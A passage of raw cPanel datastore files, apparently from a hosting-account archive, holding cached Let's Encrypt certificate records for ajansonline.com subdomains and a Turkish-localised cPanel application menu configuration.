Encrypt\ncommonName\nR11","subject_text":"commonName\nonlineislemler.ajansonline.com","is_autossl":1,"id":"onlineislemler_ajansonline_com_b9e3d_e306b_1753644994_e47930740d386945e8c7772cc21969e3","modulus":"b9e3d911a0ccbc420d21a7dbffff179253e305e49ae2b094905252565b445a9c0d3073698b3560cf5c0067d833ff27f068fa740234d29e68fa69a574f3fa8cc099aa5dd1db98669a1cbf0b3f19d832171c552a5683782a60092af39934bbd3985d6848ea98af415c4ab1b1b5b24a04152813783a3d37400ee8a09ec7a893a9b03d4d93900df1c39f4f95ef0c2b66edb0e3b89d63a658cbfe7f2e457a5d8bac124f4e558bfaaf01531086d16e6c6ed588ae6355ea3700a4df16f927d1ce0c3c2803559631700b5220d0222b00aa510abfec9b27819b81a83f3b01453c4495057939b7416821fc1746b7ce44aa51664514b4384e73483f3b6969bd203e34ae306b","not_after":1753644994,"issuer.commonName":"R11","not_before":1745868995,"auto_ssl_provider":"LetsEncrypt","auto_ssl_provider_display_name":"Let’s Encrypt™","issuer.organizationName":"Let's Encrypt","subject.commonName":"onlineislemler.ajansonline.com","modulus_length":2048,"is_self_signed":0,"validation_type":"dv","signature_algorithm":"sha256WithRSAEncryption","domains":["onlineislemler.ajansonline.com","www.onlineislemler.ajansonline.com"]},"certificate_text":"-----BEGIN CERTIFICATE-----\nMIIFXzCCBEegAwIBAgISBYTBadI5gHoILv9R8WVRIB1fMA0GCSqGSIb3DQEBCwUA\nMDMxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQwwCgYDVQQD\nEwNSMTEwHhcNMjUwNDI4MTkzNjM1WhcNMjUwNzI3MTkzNjM0WjApMScwJQYDVQQD\nEx5vbmxpbmVpc2xlbWxlci5hamFuc29ubGluZS5jb20wggEiMA0GCSqGSIb3DQEB\nAQUAA4IBDwAwggEKAoIBAQC549kRoMy8Qg0hp9v//xeSU+MF5JrisJSQUlJWW0Ra\nnA0wc2mLNWDPXABn2DP/J/Bo+nQCNNKeaPpppXTz+ozAmapd0duYZpocvws/Gdgy\nFxxVKlaDeCpgCSrzmTS705hdaEjqmK9BXEqxsbWySgQVKBN4Oj03QA7ooJ7HqJOp\nsD1Nk5AN8cOfT5XvDCtm7bDjuJ1jpljL/n8uRXpdi6wST05Vi/qvAVMQhtFubG7V\niK5jVeo3AKTfFvkn0c4MPCgDVZYxcAtSINAiKwCqUQq/7JsngZuBqD87AUU8RJUF\neTm3QWgh/BdGt85EqlFmRRS0OE5zSD87aWm9ID40rjBrAgMBAAGjggJ1MIICcTAO\nBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwG\nA1UdEwEB/wQCMAAwHQYDVR0OBBYEFHA4z+In+C8bZqm/fpJeLwDLlrn1MB8GA1Ud\nIwQYMBaAFMXPRqTq9MPAemyVxC2wXpIvJuO5MFcGCCsGAQUFBwEBBEswSTAiBggr\nBgEFBQcwAYYWaHR0cDovL3IxMS5vLmxlbmNyLm9yZzAjBggrBgEFBQcwAoYXaHR0\ncDovL3IxMS5pLmxlbmNyLm9yZy8wTQYDVR0RBEYwRIIeb25saW5laXNsZW1sZXIu\nYWphbnNvbmxpbmUuY29tgiJ3d3cub25saW5laXNsZW1sZXIuYWphbnNvbmxpbmUu\nY29tMBMGA1UdIAQMMAowCAYGZ4EMAQIBMC4GA1UdHwQnMCUwI6AhoB+GHWh0dHA6\nLy9yMTEuYy5sZW5jci5vcmcvOTYuY3JsMIIBAwYKKwYBBAHWeQIEAgSB9ASB8QDv\nAHUAzPsPaoVxCWX+lZtTzumyfCLphVwNl422qX5UwP5MDbAAAAGWfhxJOwAABAMA\nRjBEAiADD0HDdmk5UIl4p4wVhVJ0AsvurO0F8ThkSxYR5gZTHAIgJ2gFxKbvb9xi\nb6+RtDrTJZh3fQqHTTKoyKGrz+Slod0AdgDd3Mo0ldfhFgXnlTL6x5/4PRxQ39sA\nOhQSdgosrLvIKgAAAZZ+HElrAAAEAwBHMEUCIC5t+XfDu/4aRYzFDPDobhSfXDMV\nIK8GkiHWqrzUVvXeAiEAz1/bwjiuOw7PqtowVlhWQqsrNsXdc+DxoAw6Xb6jIzgw\nDQYJKoZIhvcNAQELBQADggEBACEWoo/l2fctDfSkDmbVzUOx8G50nsSppY7Vh2mx\n+JjdpK/Gh2Wcp6ed2AB4yLnFom6TVxGVN2deaO7SFSYO9xDFPiRCXATEFHu91YsA\neHVCR/hwh0rM2tDq9cIUGyRV7wTvHvTzLaI9s+HffOheQEtld5XRwj1wLQErmnp5\nLLQatGYl1/Y8Dte0nXzu5CAz3CH8d4lRf0rSW0Banu46LXbYInDQpHHVix061vDG\nAVs0WF7+1YhNrCEzGatSHLg3zHO4jasAnrNlZKacgkkeGExsEL4zbXeHzKdsYLr1\n2Yz1ZXaesY39G4B5fZHlKH425pdsmIaHYk06ysvTxf08ddU=\n-----END CERTIFICATE-----","is_primary_on_ip":0,"needs_sni":1},{"needs_sni":1,"is_primary_on_ip":0,"certificate":{"issuer.organizationName":"Let's Encrypt","subject.commonName":"kg.ajansonline.com","auto_ssl_provider_display_name":"Let’s Encrypt™","signature_algorithm":"sha256WithRSAEncryption","validation_type":"dv","modulus_length":2048,"is_self_signed":0,"domains":["kg.ajansonline.com","www.kg.ajansonline.com"],"is_autossl":1,"id":"kg_ajansonline_com_dbe9f_f4b15_1751530104_e7a7752bce0a318cb8bd1d110cd257b5","subject_text":"commonName\nkg.ajansonline.com","not_after":1751530104,"modulus":"dbe9f54e017dd1d532993a1e3d813d87ff24915106aba6a69629a01d63832415c602513de55a09ec0bab0254f92ac728fd524559260c5dbb40de311d25eda8e4c12d4af6923ade515f8fcc6a869fc585fb3e7223bbbc326af2e2bb8d537f2edf076b97e0570d4a4d0ae41cdff319b473ba4165eb61f24c17d56aaa31632b43b81bf6ecb28d4ce1ccc1b09e85c74ab46869491b79ffed25f743c344a7508dbb3303ba1cbd5981a38308f32c496f1e324bc484fed76f396269b6fefa4cc4e4bcecba48908d86bea17e17bebbfc7f0ae7dbb53458dcb46c978c0d28d55a6c7ed02d8a6c92cae01fc1f8f41a37a467184efbcda581b3fdfb2e838431216e325f4b15","issuer_text":"countryName\nUS\norganizationName\nLet's Encrypt\ncommonName\nR10","issuer.commonName":"R10","not_before":1743754105,"auto_ssl_provider":"LetsEncrypt"},"certificate_text":"-----BEGIN CERTIFICATE-----\nMIIFPTCCBCWgAwIBAgISBvaQdK5JVZ+COEixzCCAAJlaMA0GCSqGSIb3DQEBCwUA\nMDMxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQwwCgYDVQQD\nEwNSMTAwHhcNMjUwNDA0MDgwODI1WhcNMjUwNzAzMDgwODI0WjAdMRswGQYDVQQD\nExJrZy5hamFuc29ubGluZS5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK\nAoIBAQDb6fVOAX3R1TKZOh49gT2H/ySRUQarpqaWKaAdY4MkFcYCUT3lWgnsC6sC\nVPkqxyj9UkVZJgxdu0DeMR0l7ajkwS1K9pI63lFfj8xqhp/Fhfs+ciO7vDJq8uK7\njVN/Lt8Ha5fgVw1KTQrkHN/zGbRzukFl62HyTBfVaqoxYytDuBv27LKNTOHMwbCe\nhcdKtGhpSRt5/+0l90PDRKdQjbszA7ocvVmBo4MI8yxJbx4yS8SE/tdvOWJptv76\nTMTkvOy6SJCNhr6hfhe+u/x/CufbtTRY3LRsl4wNKNVabH7QLYpsksrgH8H49Bo3\npGcYTvvNpYGz/fsug4QxIW4yX0sVAgMBAAGjggJfMIICWzAOBgNVHQ8BAf8EBAMC\nBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAw\nHQYDVR0OBBYEFLYjtz8v1aO5/PzApBcTZ5yq/fIyMB8GA1UdIwQYMBaAFLu8w0el\n5LypxsOkcgwQjaI14cjoMFcGCCsGAQUFBwEBBEswSTAiBggrBgEFBQcwAYYWaHR0\ncDovL3IxMC5vLmxlbmNyLm9yZzAjBggrBgEFBQcwAoYXaHR0cDovL3IxMC5pLmxl\nbmNyLm9yZy8wNQYDVR0RBC4wLIISa2cuYWphbnNvbmxpbmUuY29tghZ3d3cua2cu\nYWphbnNvbmxpbmUuY29tMBMGA1UdIAQMMAowCAYGZ4EMAQIBMC4GA1UdHwQnMCUw\nI6AhoB+GHWh0dHA6Ly9yMTAuYy5sZW5jci5vcmcvOTEuY3JsMIIBBQYKKwYBBAHW\neQIEAgSB9gSB8wDxAHYADeHyMCvTDcFAYhIJ6lUu/Ed0fLHX6TDvDkIetH5OqjQA\nAAGWAA2hbwAABAMARzBFAiAYBamz6DYUndPlJjMJsVIcPE4R/g3KVSdmc0LF2EvM\nGwIhAPRY7WgYRCJMChWq8tOaXk5mC+CU7sTqSJ5LATvAekRTAHcArxgaKNaMo+Cp\nikycZ6sJ+Lu8IrquvLE4o6Gd0/m2Aw0AAAGWAA2jfAAABAMASDBGAiEA+azLFDB7\nfrNG23vFlGtVUz7dUW/gxdwa0+nuc7VCnEkCIQC8BF4qY17Ke/OqbD6R6lKuiTTq\nbnvzR6+2Chs2QkKQJDANBgkqhkiG9w0BAQsFAAOCAQEAsJn8AdtHDlGPypEXIXzm\nnfJs2HgMtdw5QuDaQbnClru9T620Gcbb+iUn9g9PKNgqfwzfbrS0zW0ukuHGXsGa\nggGnFchJZlwNxO9zvrMl2HtCoUICNCqzNbvMIenVEARZD/iWBxQypGt4htaQYchs\nAL9o7h5VbMQ8TccrTykpDHGEg2qiH9ZUDhK+fbBk0mv+tdPL78djPsiBRlhy9lee\nHTzt5Q883rtSCBqQMx3P/EKMBaX6HyUXn8oxMZNAGeRSpjUAL+fvkbsmBMJ+otxW\nKRBJGnJs51O7rfxdKHwz9HzCjK6PoxM2Qyxj0k3smGBRU98pvp8YlvyPitlgeWy7\nng==\n-----END CERTIFICATE-----","servername":"kg.ajansonline.com","ip":"45.195.25.8"},{"servername":"yeni.ajansonline.com","needs_sni":1,"ip":"45.195.25.8","certificate":{"domains":["*.ajansonline.com","ajansonline.com"],"modulus_length":2048,"is_self_signed":0,"signature_algorithm":"sha256WithRSAEncryption","validation_type":"dv","auto_ssl_provider_display_name":"Let’s Encrypt™","issuer.organizationName":"Let's Encrypt","subject.commonName":"*.ajansonline.com","not_before":1743797121,"issuer.commonName":"R10","auto_ssl_provider":"LetsEncrypt","issuer_text":"countryName\nUS\norganizationName\nLet's Encrypt\ncommonName\nR10","id":"_wildcard__ajansonline_com_ba133_f585d_1751573120_2bfd3fb7b78064dcd07682a7e441aa96","subject_text":"commonName\n*.ajansonline.com","is_autossl":1,"modulus":"ba133e7bdcceb5f5c445bc084bdd3f8d17fe6dd96d7d625d687fac4b71e5905e1164d3d9c09301d86602bbec21a92e65e0f64dcb22f541345abe28d6ffad691c07734ef4b47be46ef355de719dbecd2b0c6a80fbf1d9b62e0b153affed34c044113807a3ec81633e9826fc4ac3aaaf2eca5f97ad60a8fb9065717862729b3d652fced4396e1649be676c5909bdac86f9fc332102859fde44b9cd96b12223b420d601631f29e0250a71b3630588b4346112d57b9d406df09dc66be95e969e8394c9ecd690376bacb375dc3243ad584235db1cf091db5a92b1040427d8b936f4f1a96f4472231b5e2b07b6e0d8893d388650c273af4490994aa1a3f45d957f585d","not_after":1751573120},"certificate_text":"-----BEGIN CERTIFICATE-----\nMIIFMzCCBBugAwIBAgISBhB1pUJGlg0TyRQqqca2cF10MA0GCSqGSIb3DQEBCwUA\nMDMxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQwwCgYDVQQD\nEwNSMTAwHhcNMjUwNDA0MjAwNTIxWhcNMjUwNzAzMjAwNTIwWjAcMRowGAYDVQQD\nDBEqLmFqYW5zb25saW5lLmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC\nggEBALoTPnvczrX1xEW8CEvdP40X/m3ZbX1iXWh/rEtx5ZBeEWTT2cCTAdhmArvs\nIakuZeD2Tcsi9UE0Wr4o1v+taRwHc070tHvkbvNV3nGdvs0rDGqA+/HZti4LFTr/\n7TTARBE4B6PsgWM+mCb8SsOqry7KX5etYKj7kGVxeGJymz1lL87UOW4WSb5nbFkJ\nvayG+fwzIQKFn95Euc2WsSIjtCDWAWMfKeAlCnGzYwWItDRhEtV7nUBt8J3Ga+le\nlp6DlMns1pA3a6yzddwyQ61YQjXbHPCR21qSsQQEJ9i5NvTxqW9EciMbXisHtuDY\niT04hlDCc69EkJlKoaP0XZV/WF0CAwEAAaOCAlYwggJSMA4GA1UdDwEB/wQEAwIF\noDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYDVR0TAQH/BAIwADAd\nBgNVHQ4EFgQUNgFE3dY8sqvzNycpg419YC4IBc4wHwYDVR0jBBgwFoAUu7zDR6Xk\nvKnGw6RyDBCNojXhyOgwVwYIKwYBBQUHAQEESzBJMCIGCCsGAQUFBzABhhZodHRw\nOi8vcjEwLm8ubGVuY3Iub3JnMCMGCCsGAQUFBzAChhdodHRwOi8vcjEwLmkubGVu\nY3Iub3JnLzAtBgNVHREEJjAkghEqLmFqYW5zb25saW5lLmNvbYIPYWphbnNvbmxp\nbmUuY29tMBMGA1UdIAQMMAowCAYGZ4EMAQIBMC8GA1UdHwQoMCYwJKAioCCGHmh0\ndHA6Ly9yMTAuYy5sZW5jci5vcmcvMTE3LmNybDCCAQMGCisGAQQB1nkCBAIEgfQE\ngfEA7wB1AMz7D2qFcQll/pWbU87psnwi6YVcDZeNtql+VMD+TA2wAAABlgKeAV0A\nAAQDAEYwRAIgbx6Y8j2Je2BAbDIXfM1QYSSCEx+MPOg7UgRS4+1CFWgCIFdVG2Iv\n06cH6nXJohDd0AK4tLMB72y86BkSaI7O6URgAHYApELFBklgYVSPD9TqnPt6LSZF\nTYepfy/fRVn2J086hFQAAAGWAp4JOQAABAMARzBFAiEAtfXUnvAyT+YXlVLjyOoH\n78+XxBTteXgusIbNvZ/Q6i4CID3/TvFrr7srLpA01g2gtdnPICPoidWZTlqDKcc0\nwOO0MA0GCSqGSIb3DQEBCwUAA4IBAQBMdYst/YTlo2W0hG1PXc1EBEC1MJ4CKS5g\nDxaEJnj2d7xjZdpOB4DkYmET5VdRu+UzANUO+EhvHXQqH1xlxlpXenVdonJ+sS7n\nLcCetzvkYUD0Kec3L9Rv7HhVdBnA9xzlrKG6WVF9a6ARvjuKNfKOjjBG1UGb8Vb1\nbZmDPUkCXakHQ2GU6rMNXcEniAgdyPLOwTSaNn7iZsliCrlyhiW9t3ejJ8IIkAgE\njUw9HiE3DN1/Yhm6n0mJon3oYirCJF+bsI2l0xm3PItx7YyiR29P+D2bnPwW2tzu\nImgV9SHy1c3s4z6w8eimghYIt6AckDwo7NSynsXFFjGXRdvImFU8\n-----END CERTIFICATE-----","is_primary_on_ip":0}]},"version":"2.4","status":1,"statusmsg":"Ran adminbin Cpanel/ssl/FETCHINSTALLEDHOSTS","mode":"full"} datastore/AVAILABLE_APPLICATIONS_CACHE_tr_jupiter 0000600 00000107270 15025306755 0015044 0 ustar 00 {"VERSION":5.4,"groups":[{"desc":"Metrik","items":[{"group":"metrics","url":"stats/lastvisitors_landing.html","height":"48","feature":"lastvisits","onclick":"","base64_png_image":"","searchtext":"en son ziyaretçiler Ziyaretçiler","description":"Display detailed information about recent visits to your website.","key":"visitors","plainitemdesc":"Visitors","target":"","type":"image","if":"$HASROLE{'WebServer'}","imgtype":"icon","width":"48","itemdesc":"Ziyaretçiler","itemorder":"1","subtype":"img","acontent":"","file":"visitors"},{"file":"cpanel-koality-plugin","itemorder":"2","itemdesc":"Site Quality Monitoring","width":"48","acontent":"","subtype":"img","imgtype":"icon","target":"","plainitemdesc":"Site Quality Monitoring","if":"$HASROLE{'WebServer'}","type":"image","base64_png_image":"","searchtext":"website quality check monitor plugin Site Quality Monitoring","description":"Site Quality Monitoring","height":"48","onclick":"","feature":"koality","group":"metrics","url":"koality/signup/index.html"},{"url":"stats/errlog.html","group":"metrics","feature":"errlog","onclick":"","height":"48","description":"View the most recent entries in the Apache® error logs.","searchtext":"Hatalar hata günlüğü hata günlüğü","key":"errors","base64_png_image":"","if":"$HASROLE{'WebServer'}","type":"image","plainitemdesc":"Errors","target":"","imgtype":"icon","acontent":"","subtype":"img","width":"48","itemdesc":"Hatalar","itemorder":"2","file":"errors"},{"file":"bandwidth","width":"48","itemdesc":"Bant Genişliği","itemorder":"3","acontent":"","subtype":"img","imgtype":"icon","target":"","plainitemdesc":"Bandwidth","if":"$SERVICEPROVIDED{'ftp'} || $HASROLE{'MailReceive'} || $HASROLE{'WebServer'}","type":"image","base64_png_image":"","searchtext":"Bant Genişliği bandmin aktarımı","description":"View bandwidth usage graphs by protocol over multiple lengths of time.","key":"bandwidth","height":"48","feature":"bandwidth","onclick":"","group":"metrics","url":"stats/bandwidth.html"},{"file":"raw_access","width":"48","itemdesc":"Ham Erişim","itemorder":"4","acontent":"","subtype":"img","imgtype":"icon","plainitemdesc":"Raw Access","target":"","if":"$HASROLE{'WebServer'}","type":"image","base64_png_image":"","searchtext":"Ham Erişim günlükler ham günlükler hamgünlükler","description":"View the raw Apache® logs for your site’s visitors.","key":"raw_access","height":"48","feature":"rawlog","onclick":"","group":"metrics","url":"raw/index.html"},{"base64_png_image":"","key":"awstats","description":"View traffic statistics from the AWStats software.","searchtext":"Awstats awstats","height":"48","onclick":"","feature":"awstats","implements":"Stats_AWStats","group":"metrics","url":"stats/awstats_landing.html","file":"awstats","itemorder":"5","itemdesc":"Awstats","width":"48","acontent":"","subtype":"img","imgtype":"icon","plainitemdesc":"Awstats","target":"","type":"image","if":"$HASROLE{'WebServer'} && !$CONFIF{'skipawstats'}"},{"key":"metrics_editor","description":"Select metrics programs to process your log files and provide traffic analysis for your cPanel account’s domains.","searchtext":"Metrik Düzenleyici istatistik yöneticisi günlük programlarını seç Metrik Düzenleyicisi","base64_png_image":"","onclick":"","feature":"statselect","height":"32","url":"statmanager/index.html","group":"metrics","file":"metrics_editor","acontent":"","subtype":"img","itemorder":"10","itemdesc":"Metrik Düzenleyicisi","width":"32","imgtype":"icon","type":"image","if":"$HASROLE{'WebServer'} && $any_stats_enabled","plainitemdesc":"Metrics Editor","target":""}],"group":"metrics"},{"desc":"Dosyalar","items":[{"file":"file_manager","itemorder":"1","width":"48","itemdesc":"Dosya Yöneticisi","subtype":"img","acontent":"target=\"file_manager\"","imgtype":"icon","plainitemdesc":"File Manager","target":"file_manager","type":"image","if":"$HASROLE{'FileStorage'}","base64_png_image":"","key":"file_manager","description":"Manage and edit your files.","searchtext":"Dosya Yöneticisi dosya yöneticisi","height":"48","onclick":"","feature":"filemanager","implements":"FileManager_Home","group":"files","url":"filemanager/index.html"},{"acontent":"","subtype":"img","width":"48","itemdesc":"Görüntüler","itemorder":"2","file":"images","if":"$HASROLE{'WebServer'}","type":"image","plainitemdesc":"Images","target":"","imgtype":"icon","feature":"cpanelpro_images","onclick":"","height":"48","searchtext":"görüntü yöneticisi yeniden boyutlandırma yöneticisi ölçekleyici küçük resim yapıcı biçimi Görüntüler","description":"Modify and manage images saved to your cPanel account.","key":"images","base64_png_image":"","url":"cpanelpro/images.html","group":"files"},{"subtype":"img","acontent":"","width":"48","itemdesc":"Dizin Gizliliği","itemorder":"3","file":"directory_privacy","type":"image","if":"$HASROLE{'WebServer'}","plainitemdesc":"Directory Privacy","target":"","imgtype":"icon","feature":"webprotect","onclick":"","height":"48","description":"Protect specific directories in your files on your cPanel account.","searchtext":"Dizin Gizliliği şifre korumalı şifre korumalı","key":"directory_privacy","base64_png_image":"","url":"htaccess/index.html","group":"files"},{"feature":"diskusageviewer","onclick":"","height":"48","searchtext":"Disk Kullanımı disk alanı kullanımı disk kullanımı","description":"View information about your files, your directories, and how you use your disk space.","key":"disk_usage","base64_png_image":"","url":"diskusage/index.html","group":"files","acontent":"","subtype":"img","itemdesc":"Disk Kullanımı","width":"48","itemorder":"4","file":"disk_usage","if":"$HASROLE{'FileStorage'}","type":"image","target":"","plainitemdesc":"Disk Usage","imgtype":"icon"},{"group":"files","url":"webdav/accounts_webdav.html","base64_png_image":"","key":"web_disk","description":"Manage files on multiple types of devices.","searchtext":"Web Disk webdav webdisk","height":"48","onclick":"","feature":"webdisk","imgtype":"icon","target":"","plainitemdesc":"Web Disk","if":"$HASROLE{'WebDisk'} && $hascpdavd","type":"image","file":"web_disk","itemorder":"5","width":"48","itemdesc":"Web Disk","subtype":"img","acontent":""},{"file":"ftp_accounts","touch":"ftp","acontent":"","subtype":"img","itemdesc":"FTP Hesapları","width":"48","itemorder":"6","imgtype":"icon","type":"image","if":"$SERVICEPROVIDED{'ftp'}","plainitemdesc":"FTP Accounts","target":"","description":"Create, manage, and delete FTP accounts.","searchtext":"FTP Hesapları ftp oluştur","key":"ftp_accounts","base64_png_image":"","feature":"ftpaccts","onclick":"","height":"48","url":"ftp/accounts.html","group":"files"},{"imgtype":"icon","target":"","plainitemdesc":"Backup","if":"$HASROLE{'MailReceive'} || $HASROLE{'FileStorage'} || $SERVICEPROVIDED{'mysql'}","type":"image","file":"backup","itemorder":"9","itemdesc":"Yedekleme","width":"48","subtype":"img","acontent":"","implements":"Backups_Home","group":"files","url":"backup/index.html","base64_png_image":"","key":"backup","searchtext":"Yedeklemeyi geri yükle","description":"Download and store your website in a backup file.","height":"48","onclick":"","feature":"backup"},{"url":"backup/wizard.html","group":"files","onclick":"","feature":"backup","height":"48","key":"backup_wizard","description":"Back up all or part of your website, or restore it from the most recent backup file.","searchtext":"Yedekleme Sihirbazı geri yükleme","base64_png_image":"","type":"image","if":"$HASROLE{'MailReceive'} || $HASROLE{'FileStorage'} || $SERVICEPROVIDED{'mysql'}","plainitemdesc":"Backup Wizard","target":"","imgtype":"icon","subtype":"img","acontent":"","itemorder":"9","width":"48","itemdesc":"Yedekleme Sihirbazı","file":"backup_wizard"},{"url":"jetbackup/index.html#!/","group":"files","searchtext":"JetBackup","description":"JetBackup","base64_png_image":"","feature":"jetbackupsingle","onclick":"","height":"48","imgtype":"icon","type":"image","target":"","plainitemdesc":"JetBackup","file":"jetbackupsingle","acontent":"","subtype":"img","width":"48","itemdesc":"JetBackup","itemorder":0}],"group":"files"},{"group":"security","items":[{"base64_png_image":"","description":"Create, manage, and delete SSL certificates, signing requests, and keys.","searchtext":"SSL/TLS sertifika anahtarı csr","key":"ssl_tls","height":"48","feature":"sslmanager","onclick":"","implements":"SSL_TLS_Manager","group":"security","url":"ssl/index.html","file":"ssl_tls","width":"48","itemdesc":"SSL/TLS","itemorder":"3","subtype":"img","acontent":"","imgtype":"icon","target":"","plainitemdesc":"SSL/TLS","type":"image","if":"$HASROLE{'UserSSL'}"},{"url":"api_tokens/index.html","group":"security","implements":"API_Tokens_Manager","onclick":"","feature":"apitokens","height":"48","key":"api_tokens","searchtext":"Manage API Tokens access api connect login","description":"Create, manage, and delete API tokens.","base64_png_image":"","type":"image","plainitemdesc":"Manage API Tokens","target":"","imgtype":"icon","subtype":"img","acontent":"","itemorder":"4","itemdesc":"Manage API Tokens","width":"48","file":"api_tokens"},{"group":"security","url":"mime/hotlink.html","base64_png_image":"","key":"hotlink_protection","description":"Prevent external sites and users from embedding your website’s content.","searchtext":"Hotlink Koruması","height":"48","onclick":"","feature":"hotlink","imgtype":"icon","plainitemdesc":"Hotlink Protection","target":"","type":"image","if":"$HASROLE{'WebServer'}","file":"hotlink_protection","itemorder":"4","itemdesc":"Hotlink Koruması","width":"48","acontent":"","subtype":"img"},{"group":"security","url":"htaccess/leechprotect/leechprotect.html","base64_png_image":"","key":"leech_protection","searchtext":"Leech Koruması koru","description":"Detect unusual levels of activity in password-restricted directories.","height":"48","onclick":"","feature":"cpanelpro_leechprotect && webprotect","imgtype":"icon","target":"","plainitemdesc":"Leech Protection","type":"image","if":"$HASROLE{'WebServer'}","file":"leech_protection","itemorder":"5","width":"48","itemdesc":"Leech Koruması","acontent":"","subtype":"img"},{"feature":"sslinstall","onclick":"","height":"48","description":"View, upgrade, or renew your domains’ SSLcertificates.","searchtext":"SSL/TLS Status","key":"tls_status","base64_png_image":"","url":"security/tls_status/","group":"security","implements":"SSL_TLS_Status","subtype":"img","acontent":"","width":"48","itemdesc":"SSL/TLS Status","itemorder":"7","file":"tls_status","type":"image","if":"$HASROLE{'UserSSL'}","plainitemdesc":"[asis,SSL]/[asis,TLS] Status","target":"","imgtype":"icon"}],"desc":"Güvenlik"},{"items":[{"file":"ls_web_cache_manager","width":"48","itemdesc":"LiteSpeed Web Cache Manager","itemorder":"1","subtype":"img","acontent":"","imgtype":"icon","target":"","plainitemdesc":"LiteSpeed Web Cache Manager","type":"image","base64_png_image":"","searchtext":"LiteSpeed Web Cache Manager","description":"LiteSpeed Web Cache Manager","height":"48","feature":"ls_web_cache_manager","onclick":"","group":"advanced","url":"ls_web_cache_manager.html.tt"},{"url":"/xferwhm/","group":"advanced","key":"web_host_manager","description":"WebHost Manager®","searchtext":"WebHost Manage webhostmanager whm WebHost Manager®","base64_png_image":"","onclick":"","height":"48","imgtype":"icon","type":"image","if":"$isreseller","target":"","file":"web_host_manager","subtype":"img","acontent":"","itemorder":"1","itemdesc":"WebHost Manager®","width":"48"},{"file":"cron_jobs","subtype":"img","acontent":"","width":"48","itemdesc":"Cron İşleri","itemorder":"2","imgtype":"icon","if":"$HASROLE{'WebServer'}","type":"image","plainitemdesc":"Cron Jobs","target":"","description":"Create, manage, and delete scheduled tasks.","searchtext":"Cron İşleri cron işi cron sekmesi düzenle","key":"cron_jobs","base64_png_image":"","feature":"cron","onclick":"","height":"48","implements":"Cron_Home","url":"cron/index.html","group":"advanced"},{"file":"indexes","itemdesc":"İndeksler","width":"48","itemorder":"4","subtype":"img","acontent":"","imgtype":"icon","target":"","plainitemdesc":"Indexes","type":"image","if":"$HASROLE{'WebServer'}","base64_png_image":"","searchtext":"İndeksler indeks yöneticisi","description":"Define how the server displays a specific directory’s index to a visitor, or to disable index display for a directory.","key":"indexes","height":"48","feature":"indexmanager","onclick":"","group":"advanced","url":"indexmanager/index.html"},{"file":"error_pages","acontent":"","subtype":"img","itemdesc":"Hata Sayfaları","width":"48","itemorder":"5","imgtype":"icon","type":"image","if":"$HASROLE{'WebServer'}","target":"","plainitemdesc":"Error Pages","searchtext":"Hata Sayfaları hata günlüğü hata_günlüğü hata günlüğü","description":"Inform visitors about problems when they attempt to access your website.","key":"error_pages","base64_png_image":"","feature":"errpgs","onclick":"","height":"48","url":"err/index.html","group":"advanced"},{"url":"clam-av/index.html","group":"advanced","key":"clam_av","searchtext":"Virüs Tarayıcısı clam clamav antivirüs","description":"Scan your cPanel account for viruses.","base64_png_image":"","onclick":"","feature":"clamavconnector_scan","height":"48","imgtype":"icon","if":"$hasclamav && $HASROLE{'MailReceive'}","type":"image","plainitemdesc":"Virus Scanner","target":"","file":"clam_av","acontent":"","subtype":"img","touch":"clamav","itemorder":"8","width":"48","itemdesc":"Virüs Tarayıcı"}],"group":"advanced","desc":"Gelişmiş"},{"desc":"JetBackup","group":"jetbackup","items":[{"imgtype":"icon","target":"","plainitemdesc":"Full Account Backups","type":"image","file":"jetbackupfullbackups","width":"48","itemdesc":"Full Account Backups","itemorder":"1","acontent":"","subtype":"img","group":"jetbackup","url":"jetbackup/index.html#!/fullBackups","base64_png_image":"","searchtext":"Full Account Backups","description":"Full Account Backups","height":"48","feature":"jetbackupfullbackups","onclick":""},{"description":"File Backups","searchtext":"File Backups","base64_png_image":"","onclick":"","feature":"jetbackupfilesbackups","height":"48","url":"jetbackup/index.html#!/fileBackups","group":"jetbackup","file":"jetbackupfilesbackups","subtype":"img","acontent":"","itemorder":"2","width":"48","itemdesc":"File Backups","imgtype":"icon","type":"image","target":"","plainitemdesc":"File Backups"},{"file":"jetbackupcronbackups","width":"48","itemdesc":"Cron Job Backups","itemorder":"3","acontent":"","subtype":"img","imgtype":"icon","target":"","plainitemdesc":"Cron Job Backups","type":"image","base64_png_image":"","description":"Cron Job Backups","searchtext":"Cron Job Backups","height":"48","feature":"jetbackupcronbackups","onclick":"","group":"jetbackup","url":"jetbackup/index.html#!/cronBackups"},{"width":"48","itemdesc":"DNS Zone Backups","itemorder":"4","acontent":"","subtype":"img","file":"jetbackupdnsbackups","plainitemdesc":"DNS Zone Backups","target":"","type":"image","imgtype":"icon","height":"48","feature":"jetbackupdnsbackups","onclick":"","base64_png_image":"","searchtext":"DNS Zone Backups","description":"DNS Zone Backups","group":"jetbackup","url":"jetbackup/index.html#!/dnsBackups"},{"url":"jetbackup/index.html#!/dbBackups","group":"jetbackup","searchtext":"Database Backups","description":"Database Backups","base64_png_image":"","feature":"jetbackupdbbackups","onclick":"","height":"48","imgtype":"icon","type":"image","target":"","plainitemdesc":"Database Backups","file":"jetbackupdbbackups","subtype":"img","acontent":"","width":"48","itemdesc":"Database Backups","itemorder":"5"},{"base64_png_image":"","description":"Email Backups","searchtext":"Email Backups","height":"48","onclick":"","feature":"jetbackupemailbackups","group":"jetbackup","url":"jetbackup/index.html#!/emailBackups","file":"jetbackupemailbackups","itemorder":"6","width":"48","itemdesc":"Email Backups","subtype":"img","acontent":"","imgtype":"icon","target":"","plainitemdesc":"Email 